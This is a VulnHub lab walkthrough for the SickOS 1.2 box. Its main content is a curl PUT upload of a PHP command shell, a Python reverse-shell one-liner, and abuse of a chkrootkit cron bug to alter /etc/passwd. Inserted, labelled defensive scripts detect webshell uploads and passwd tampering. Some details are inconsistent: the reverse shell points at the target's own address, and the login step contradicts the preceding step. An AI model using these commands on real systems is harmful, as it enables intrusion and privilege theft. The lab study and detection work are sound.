
VulnHub – SickOS 1.2 Walkthrough

Introduction

This is a Linux box that involved exploiting the HTTP PUT method to upload a PHP script, through which a reverse shell can be obtained, and then using a known vulnerability in the chkrootkit program to escalate to root.

Enumeration

The first thing to do is to run a TCP Nmap scan against the 1000 most common ports, using the following flags:

  • -sC to run default scripts
  • -sV to enumerate application versions
  • -Pn to skip the host discovery phase, as some hosts will not respond to ping requests
  • -oA to save the output in all formats available

Enumerating the HTTP Port

When accessing the web server, the following page is displayed:

The source code does not contain anything useful.

The next step is to run a scan to find hidden files or directories using Wfuzz, with the following flags:

  • -w to specify the word list to use
  • --hc to exclude certain response codes
  • specifying the URL to scan, using FUZZ to indicate which part to fuzz

It looks like the “/test” entry leads to a lighttpd 1.4.28 web server.

After searching on SearchSploit, it looks like no known exploits are available for it.

The other entries are forbidden:

When checking the available methods through curl, the PUT method is available. This could be used to upload a reverse shell.

curl -v -X OPTIONS 10.10.10.131/test

Exploiting file upload via PUT request

Using curl to upload a PHP file containing the following code, which will allow us to execute commands remotely:

curl -v -X PUT -d '<?php echo system($_REQUEST["cmd"]);?>' http://10.10.10.131/test/stef.php

When accessing the file, commands can be executed remotely through the “cmd” parameter:
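From the defender's side, the sequence above (an OPTIONS probe, a PUT of a .php file, then a GET with a cmd parameter) leaves a clear trace in the web server's access log. The script below is an added example, not part of the original walkthrough, that pulls successful PUT uploads of server-side scripts out of a Common Log Format access log (the default format for lighttpd and Apache) and then lists the later requests made to the uploaded files. The log lines, client addresses and timestamps are constructed for the example; stef.php is the file name used above.

```shell
#!/bin/sh
# Constructed sample access log in Common Log Format (lighttpd/Apache default).
# Client addresses and timestamps are made up for this example.
LOG_FILE="$(mktemp)"
cat > "$LOG_FILE" <<'EOF'
10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /test/ HTTP/1.1" 200 1024
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "OPTIONS /test/ HTTP/1.1" 200 0
10.0.0.5 - - [01/Jan/2024:10:00:02 +0000] "PUT /test/stef.php HTTP/1.1" 201 0
10.0.0.5 - - [01/Jan/2024:10:00:03 +0000] "GET /test/stef.php?cmd=id HTTP/1.1" 200 54
10.0.0.9 - - [01/Jan/2024:10:00:04 +0000] "PUT /test/notes.txt HTTP/1.1" 403 0
10.0.0.7 - - [01/Jan/2024:10:00:05 +0000] "GET /index.php HTTP/1.1" 200 2048
EOF

# Field layout of one CLF line after default awk splitting:
#   $6 = "METHOD (with the opening quote), $7 = request path, $9 = status code
# Print the lines recording a successful (2xx) PUT whose target looks like a
# server-side script. $1: path to the access log.
suspicious_puts() {
    awk '$6 == "\"PUT" && $9 ~ /^2/ &&
         $7 ~ /\.(php|phtml|php[0-9]|jsp|asp|aspx|cgi|pl)([?]|$)/' "$1"
}

# Number of such uploads, convenient for an alert condition of "more than zero"
count_suspicious_puts() {
    suspicious_puts "$1" | wc -l | tr -d ' '
}

# Every non-PUT request to a file that an earlier PUT created, i.e. the
# probable use of the uploaded script as a web shell. $1: path to the log.
webshell_requests() {
    suspicious_puts "$1" | awk '{ sub(/[?].*/, "", $7); print $7 }' | sort -u |
    while read -r path; do
        awk -v p="$path" '$6 != "\"PUT" && index($7, p) == 1' "$1"
    done
}

# Stand-alone run: print the findings
echo "Script uploads via PUT:"; suspicious_puts "$LOG_FILE"
echo "Requests to uploaded scripts:"; webshell_requests "$LOG_FILE"
```

The status-code filter matters: a 403 on a PUT (the notes.txt line) shows an attempt that the server refused, which is worth counting separately from a 201 that shows the file actually landed.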

The next step is to set up a Netcat listener, which will catch our reverse shell when it is executed by the victim host, using the following flags:

  • -l to listen for incoming connections
  • -v for verbose output
  • -n to skip the DNS lookup
  • -p to specify the port to listen on

Executing a Python reverse shell through the cmd parameter:

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.10.131",443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")'

Received a callback and established a reverse shell connection to the host:

Privilege Escalation

When inspecting the cron jobs on the machine, “chkrootkit” stands out:

Chkrootkit is a common Unix-based program intended to help system administrators check their systems for known rootkits.
Using SearchSploit to find known vulnerabilities in chkrootkit:

Checking the chkrootkit version on the box; it matches the one in the exploit:

Looking at the exploit, the slapper function expects a file name in the file_port variable; if it is left empty, chkrootkit simply executes, as root, any file named “update”, because the variable was used without quotation marks:

Below are the steps required to exploit this vulnerability:
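To make the bug the exploit relies on concrete: in the slapper() check of the affected chkrootkit versions, the file names it finds are collected with the unquoted assignment file_port=$file_port $i. When file_port is empty, the shell parses that line as "run $i with file_port set in its environment" rather than as an assignment, so /tmp/update is executed with chkrootkit's (root) privileges. The following is an added example, not chkrootkit's own code or the exploit from the walkthrough, reproducing the vulnerable and the corrected pattern side by side inside a throwaway temporary directory, where the "update" file only drops a marker so the difference is observable.

```shell
#!/bin/sh
# Private working directory standing in for the real ROOTDIR; the "update"
# file created here does nothing but create a marker file when it runs.
WORK="$(mktemp -d)"
mkdir -p "$WORK/tmp"
printf '#!/bin/sh\ntouch "%s/marker"\n' "$WORK" > "$WORK/tmp/update"
chmod 755 "$WORK/tmp/update"

ROOTDIR="$WORK/"
SLAPPER_FILES="${ROOTDIR}tmp/update"

# Vulnerable pattern. With file_port empty, "file_port=$file_port $i" is not
# an assignment of two words but an invocation of $i with a temporary
# environment variable, so the file the loop found gets executed.
vulnerable_collect() {
    file_port=
    for i in ${SLAPPER_FILES}; do
        if [ -f ${i} ]; then
            file_port=$file_port $i
        fi
    done
    echo "$file_port"          # stays empty: no assignment ever happened
}

# Corrected pattern: quoting turns the line into a plain assignment of a
# space-separated list, and nothing is executed.
fixed_collect() {
    file_port=
    for i in ${SLAPPER_FILES}; do
        if [ -f ${i} ]; then
            file_port="$file_port $i"
        fi
    done
    echo "$file_port"
}

# Did tmp/update run? Exit status 0 if the marker exists, 1 otherwise.
update_was_executed() {
    [ -f "$WORK/marker" ]
}

reset_marker() {
    rm -f "$WORK/marker"
}

# Stand-alone run
reset_marker; vulnerable_collect >/dev/null
update_was_executed && echo "vulnerable pattern: tmp/update was executed"
reset_marker; fixed_collect >/dev/null
update_was_executed || echo "fixed pattern: tmp/update was not executed"
```

The same shape of bug is what shellcheck reports as SC2037; the mitigation on a real host is simply running a chkrootkit build with the quoted assignment, and, independently of that, keeping /tmp mounted noexec so a dropped file cannot be run from there by a cron job.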

Created a quick bash script to change the permissions of the /etc/passwd file

A new root user can be created by adding a new line to the /etc/passwd file. The steps required are the following:

  • Reading a few lines from the /etc/passwd file to verify the format
  • Generating a new password hash using openssl
  • Adding a new line to the /etc/passwd file, replacing the “x” with the previously created password hash

This could not be achieved with the sed command, as the current user did not have permission to write a temporary file in the /etc folder. In this scenario I decided to instead replace the root user’s password.

This can be done using awk or echo, as shown below:

Logging in using SSH as the newly created user:
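Both changes described in the steps above (a second UID 0 entry, or a password hash written straight into /etc/passwd in place of the x) are easy to audit for. The script below is an added example, not part of the walkthrough, that checks a passwd file for extra UID 0 accounts, for entries carrying a hash instead of the shadow placeholder, and for account names that are absent from a saved baseline copy. The two passwd files are constructed for the example and the hash strings in them are placeholders, not real hashes.

```shell
#!/bin/sh
# Constructed baseline copy of /etc/passwd (the file before any tampering).
BASELINE="$(mktemp)"
cat > "$BASELINE" <<'EOF'
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
john:x:1000:1000:John:/home/john:/bin/bash
EOF

# Constructed current copy: root's "x" was replaced by a hash, and a second
# UID 0 account was appended. Both hash strings are placeholders, not real.
CURRENT="$(mktemp)"
cat > "$CURRENT" <<'EOF'
root:$1$PLACEHOLDER$notarealhashvalue000:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
john:x:1000:1000:John:/home/john:/bin/bash
backdoor:$1$PLACEHOLDER$notarealhashvalue001:0:0::/root:/bin/bash
EOF

# Account names with UID 0 other than root. $1: passwd file
extra_uid0_accounts() {
    awk -F: '$3 == 0 && $1 != "root" { print $1 }' "$1"
}

# Account names whose password field is neither the shadow placeholder "x"
# nor a lock marker ("*" or starting with "!"), i.e. a hash kept in the
# world-readable passwd file itself. $1: passwd file
hash_in_passwd() {
    awk -F: '$2 != "x" && $2 != "*" && $2 !~ /^!/ { print $1 }' "$1"
}

# Account names present in the current file but not in the baseline.
# $1: baseline passwd file, $2: current passwd file
new_accounts() {
    base_names="$(mktemp)"; cur_names="$(mktemp)"
    cut -d: -f1 "$1" | sort > "$base_names"
    cut -d: -f1 "$2" | sort > "$cur_names"
    comm -13 "$base_names" "$cur_names"
    rm -f "$base_names" "$cur_names"
}

# Stand-alone run
echo "UID 0 accounts besides root:"; extra_uid0_accounts "$CURRENT"
echo "Accounts with a hash stored in passwd:"; hash_in_passwd "$CURRENT"
echo "Accounts not in baseline:"; new_accounts "$BASELINE" "$CURRENT"
```

The baseline comparison only works if the saved copy lives somewhere the web server user and other unprivileged accounts cannot touch; a file-integrity tool that hashes /etc/passwd and /etc/shadow on a schedule gives the same signal without a hand-kept copy.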

Conclusion

This was a really fun box; although the initial exploitation process wasn’t that hard, it is definitely not something you see every day. What I liked most was the vulnerability in the chkrootkit tool, as this rootkit detection tool is something you see quite often on Linux, and not something you’d expect to carry such a critical vulnerability.